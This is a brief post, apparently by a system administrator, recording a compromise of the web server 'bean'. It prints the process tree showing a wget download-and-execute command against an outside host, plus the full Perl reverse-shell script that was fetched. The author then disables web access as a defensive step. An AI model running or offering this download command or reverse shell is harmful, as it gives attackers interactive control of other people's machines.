I noticed a www process spinning away on bean:
root@bean~$ptree 15591
405 /usr/local/apache2/bin/httpsd -k start
438 /usr/local/apache2/bin/httpsd -k start
15591 sh -c wget https://881107.com/ping.txt;mv ping.txt temp2006;perl temp2006 203.11
14402 perl temp2006 203.118.99.19 3303
and then after looking at the code
root@bean~$more ping.txt
#!/usr/bin/perl
use Socket;
use FileHandle;
$IP = $ARGV[0];
$PORT = $ARGV[1];
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname(‘tcp’));
connect(SOCKET, sockaddr_in($PORT,inet_aton($IP)));
SOCKET->autoflush();
open(STDIN, “>&SOCKET”);
open(STDOUT,”>&SOCKET”);
open(STDERR,”>&SOCKET”);
system(“id;pwd;uname -a;w;HISTFILE=/dev/null /bin/sh -i”);
noticed that it looked like a known hack attempt as documented here. So for the time being I’ve disabled web access until I can re-install a web zone.